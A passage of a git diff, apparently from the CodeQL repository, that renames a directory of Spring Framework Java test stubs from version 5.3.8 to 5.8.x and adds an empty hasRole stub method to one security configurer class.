java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/web/configurers/ExpressionUrlAuthorizationConfigurer.java index 012997dc5024..be4e14019779 100644 --- a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/ExpressionUrlAuthorizationConfigurer.java +++ b/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/web/configurers/ExpressionUrlAuthorizationConfigurer.java @@ -12,5 +12,9 @@ public class AuthorizedUrl { public ExpressionInterceptUrlRegistry permitAll() { return null; } + + public ExpressionInterceptUrlRegistry hasRole(String role) { + return null; + } } } diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/web/server/ServerHttpSecurity.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/web/server/ServerHttpSecurity.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/web/server/ServerHttpSecurity.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/web/server/ServerHttpSecurity.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/web/DefaultSecurityFilterChain.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/web/DefaultSecurityFilterChain.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/security/web/DefaultSecurityFilterChain.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/security/web/DefaultSecurityFilterChain.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/web/SecurityFilterChain.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/web/SecurityFilterChain.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/security/web/SecurityFilterChain.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/security/web/SecurityFilterChain.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/web/csrf/CsrfToken.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/web/csrf/CsrfToken.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/security/web/csrf/CsrfToken.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/security/web/csrf/CsrfToken.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/web/savedrequest/SavedRequest.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/web/savedrequest/SavedRequest.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/security/web/savedrequest/SavedRequest.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/security/web/savedrequest/SavedRequest.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/web/savedrequest/SimpleSavedRequest.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/web/savedrequest/SimpleSavedRequest.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/security/web/savedrequest/SimpleSavedRequest.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/security/web/savedrequest/SimpleSavedRequest.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/web/util/matcher/RequestMatcher.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/web/util/matcher/RequestMatcher.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/security/web/util/matcher/RequestMatcher.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/security/web/util/matcher/RequestMatcher.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/stereotype/Component.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/stereotype/Component.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/stereotype/Component.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/stereotype/Component.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/stereotype/Controller.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/stereotype/Controller.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/stereotype/Controller.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/stereotype/Controller.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/stereotype/Indexed.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/stereotype/Indexed.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/stereotype/Indexed.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/stereotype/Indexed.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/stereotype/Repository.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/stereotype/Repository.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/stereotype/Repository.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/stereotype/Repository.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/stereotype/Service.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/stereotype/Service.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/stereotype/Service.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/stereotype/Service.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/ui/ConcurrentModel.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/ui/ConcurrentModel.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/ui/ConcurrentModel.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/ui/ConcurrentModel.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/ui/Model.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/ui/Model.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/ui/Model.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/ui/Model.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/ui/ModelMap.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/ui/ModelMap.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/ui/ModelMap.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/ui/ModelMap.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/util/AntPathMatcher.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/util/AntPathMatcher.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/util/AntPathMatcher.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/util/AntPathMatcher.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/util/AutoPopulatingList.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/util/AutoPopulatingList.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/util/AutoPopulatingList.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/util/AutoPopulatingList.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/util/Base64Utils.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/util/Base64Utils.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/util/Base64Utils.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/util/Base64Utils.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/util/CollectionUtils.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/util/CollectionUtils.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/util/CollectionUtils.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/util/CollectionUtils.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/util/CompositeIterator.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/util/CompositeIterator.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/util/CompositeIterator.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/util/CompositeIterator.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/util/FastByteArrayOutputStream.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/util/FastByteArrayOutputStream.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/util/FastByteArrayOutputStream.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/util/FastByteArrayOutputStream.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/util/FileCopyUtils.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/util/FileCopyUtils.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/util/FileCopyUtils.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/util/FileCopyUtils.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/util/FileSystemUtils.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/util/FileSystemUtils.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/util/FileSystemUtils.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/util/FileSystemUtils.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/util/LinkedMultiValueMap.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/util/LinkedMultiValueMap.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/util/LinkedMultiValueMap.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/util/LinkedMultiValueMap.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/util/MimeType.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/util/MimeType.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/util/MimeType.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/util/MimeType.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/util/MultiValueMap.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/util/MultiValueMap.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/util/MultiValueMap.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/util/MultiValueMap.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/util/MultiValueMapAdapter.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/util/MultiValueMapAdapter.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/util/MultiValueMapAdapter.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/util/MultiValueMapAdapter.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/util/ObjectUtils.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/util/ObjectUtils.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/util/ObjectUtils.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/util/ObjectUtils.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/util/PathMatcher.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/util/PathMatcher.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/util/PathMatcher.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/util/PathMatcher.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/util/PropertiesPersister.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/util/PropertiesPersister.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/util/PropertiesPersister.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/util/PropertiesPersister.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/util/PropertyPlaceholderHelper.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/util/PropertyPlaceholderHelper.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/util/PropertyPlaceholderHelper.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/util/PropertyPlaceholderHelper.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/util/ResourceUtils.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/util/ResourceUtils.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/util/ResourceUtils.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/util/ResourceUtils.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/util/RouteMatcher.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/util/RouteMatcher.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/util/RouteMatcher.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/util/RouteMatcher.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/util/SerializationUtils.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/util/SerializationUtils.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/util/SerializationUtils.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/util/SerializationUtils.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/util/StreamUtils.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/util/StreamUtils.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/util/StreamUtils.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/util/StreamUtils.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/util/StringUtils.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/util/StringUtils.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/util/StringUtils.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/util/StringUtils.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/util/StringValueResolver.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/util/StringValueResolver.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/util/StringValueResolver.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/util/StringValueResolver.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/util/SystemPropertyUtils.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/util/SystemPropertyUtils.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/util/SystemPropertyUtils.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/util/SystemPropertyUtils.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/validation/Errors.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/validation/Errors.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/validation/Errors.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/validation/Errors.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/validation/FieldError.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/validation/FieldError.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/validation/FieldError.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/validation/FieldError.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/validation/ObjectError.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/validation/ObjectError.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/validation/ObjectError.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/validation/ObjectError.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/CookieValue.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/CookieValue.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/CookieValue.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/CookieValue.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/GetMapping.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/GetMapping.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/GetMapping.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/GetMapping.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/Mapping.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/Mapping.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/Mapping.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/Mapping.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/MatrixVariable.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/MatrixVariable.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/MatrixVariable.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/MatrixVariable.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/ModelAttribute.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/ModelAttribute.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/ModelAttribute.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/ModelAttribute.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/PathVariable.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/PathVariable.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/PathVariable.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/PathVariable.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/PostMapping.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/PostMapping.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/PostMapping.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/PostMapping.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/RequestAttribute.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/RequestAttribute.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/RequestAttribute.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/RequestAttribute.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/RequestBody.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/RequestBody.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/RequestBody.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/RequestBody.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/RequestHeader.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/RequestHeader.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/RequestHeader.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/RequestHeader.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/RequestMapping.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/RequestMapping.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/RequestMapping.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/RequestMapping.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/RequestMethod.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/RequestMethod.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/RequestMethod.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/RequestMethod.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/RequestParam.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/RequestParam.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/RequestParam.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/RequestParam.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/RequestPart.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/RequestPart.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/RequestPart.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/RequestPart.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/ResponseBody.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/ResponseBody.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/ResponseBody.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/ResponseBody.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/RestController.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/RestController.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/RestController.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/RestController.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/SessionAttribute.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/SessionAttribute.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/annotation/SessionAttribute.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/annotation/SessionAttribute.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/support/SessionStatus.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/support/SessionStatus.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/bind/support/SessionStatus.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/bind/support/SessionStatus.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/client/RequestCallback.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/client/RequestCallback.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/client/RequestCallback.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/client/RequestCallback.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/client/ResponseExtractor.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/client/ResponseExtractor.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/client/ResponseExtractor.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/client/ResponseExtractor.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/client/RestClientException.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/client/RestClientException.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/client/RestClientException.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/client/RestClientException.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/client/RestTemplate.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/client/RestTemplate.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/client/RestTemplate.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/client/RestTemplate.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/context/WebApplicationContext.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/context/WebApplicationContext.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/context/WebApplicationContext.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/context/WebApplicationContext.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/context/request/NativeWebRequest.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/context/request/NativeWebRequest.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/context/request/NativeWebRequest.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/context/request/NativeWebRequest.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/context/request/RequestAttributes.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/context/request/RequestAttributes.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/context/request/RequestAttributes.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/context/request/RequestAttributes.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/context/request/WebRequest.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/context/request/WebRequest.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/context/request/WebRequest.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/context/request/WebRequest.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/multipart/MultipartFile.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/multipart/MultipartFile.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/multipart/MultipartFile.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/multipart/MultipartFile.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/multipart/MultipartHttpServletRequest.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/multipart/MultipartHttpServletRequest.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/multipart/MultipartHttpServletRequest.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/multipart/MultipartHttpServletRequest.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/multipart/MultipartRequest.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/multipart/MultipartRequest.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/multipart/MultipartRequest.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/multipart/MultipartRequest.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/multipart/MultipartResolver.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/multipart/MultipartResolver.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/multipart/MultipartResolver.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/multipart/MultipartResolver.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/reactive/function/client/DefaultWebClientBuilder.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/reactive/function/client/DefaultWebClientBuilder.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/reactive/function/client/DefaultWebClientBuilder.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/reactive/function/client/DefaultWebClientBuilder.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/reactive/function/client/WebClient.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/reactive/function/client/WebClient.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/reactive/function/client/WebClient.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/reactive/function/client/WebClient.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/servlet/ModelAndView.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/servlet/ModelAndView.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/servlet/ModelAndView.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/servlet/ModelAndView.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/servlet/View.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/servlet/View.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/servlet/View.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/servlet/View.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/servlet/mvc/support/RedirectAttributes.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/servlet/mvc/support/RedirectAttributes.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/servlet/mvc/support/RedirectAttributes.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/servlet/mvc/support/RedirectAttributes.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/servlet/view/AbstractUrlBasedView.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/servlet/view/AbstractUrlBasedView.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/servlet/view/AbstractUrlBasedView.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/servlet/view/AbstractUrlBasedView.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/servlet/view/RedirectView.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/servlet/view/RedirectView.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/servlet/view/RedirectView.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/servlet/view/RedirectView.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/AbstractUriTemplateHandler.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/AbstractUriTemplateHandler.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/AbstractUriTemplateHandler.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/AbstractUriTemplateHandler.java diff --git 